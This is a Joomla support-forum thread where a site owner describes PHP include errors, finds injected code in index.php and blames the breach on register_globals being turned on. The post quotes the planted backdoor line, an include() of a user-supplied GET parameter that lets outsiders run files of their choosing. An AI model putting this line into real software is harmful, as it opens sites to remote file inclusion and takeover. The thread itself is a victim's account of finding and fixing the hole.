0
Welcome Guest! Login
0 items Join Now

Help! Have I been hacked?

Last Post
Search Topic
    • imagine4D's Avatar
    • imagine4D
    • Hero Rocketeer
    • Posts: 409
    • Thanks: 1
    • Project developer

    Help! Have I been hacked?

    Posted 17 years 5 months ago
    • Hey, I just went to access my site, and I see this:
      Warning: include() [function.include]: Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/planetas/public_html/index.php on line 2

      Are we debugging???
      Killed at line 100 in sef404.php: HEADERS ALREADY SENT (200)
      URL=http://www.planetasiazine.comoption=com_frontpage&Itemid=10096:
      OPTION=com_frontpage:

      www.planetasiazine.com/

      Freakin' out! Have I been hacked?
    #119959
    • imagine4D's Avatar
    • imagine4D
    • Hero Rocketeer
    • Posts: 409
    • Thanks: 1
    • Project developer

    Re: Help! Have I been hacked?

    Posted 17 years 5 months ago
    #119963
    • imagine4D's Avatar
    • imagine4D
    • Hero Rocketeer
    • Posts: 409
    • Thanks: 1
    • Project developer

    Re: Help! Have I been hacked?

    Posted 17 years 5 months ago
    • Just found this code in my index.php file:
      include($_GET["one"]);
      if ( ereg("http://",$_GET))
      {
      echo"Hacker1©";
      exit();
      }

      Removed it, and the problem is fixed.

      Anyone have an idea how a hacker could have pasted that code into my index.php file?
    #119967
    • Mack's Avatar
    • Mack
    • Elite Rocketeer
    • Posts: 535
    • Thanks: 0

    Re: Help! Have I been hacked?

    Posted 17 years 5 months ago
    #119969
    • imagine4D's Avatar
    • imagine4D
    • Hero Rocketeer
    • Posts: 409
    • Thanks: 1
    • Project developer

    Re: Help! Have I been hacked?

    Posted 17 years 5 months ago
    #119971
    • imagine4D's Avatar
    • imagine4D
    • Hero Rocketeer
    • Posts: 409
    • Thanks: 1
    • Project developer

    Re: Help! Have I been hacked?

    Posted 17 years 5 months ago
    • The end of the story is: the "hole" the hackers got through was because "register Globals" was set to "On".

      I went through a sea of haze on Joomla.org (.php files, CHMODS, blah blah, blah blah) that I had no idea about. Maaan, I'm just a story writer... ???

      In the end, my hosting company helped me set "register Globals" to "Off". (Good people, @ Siteground.com...)

      Anyhoo, beware Joomla users, if you have "register Globals" set to "On".

      Bye!
    #120025

Time to create page: 0.064 seconds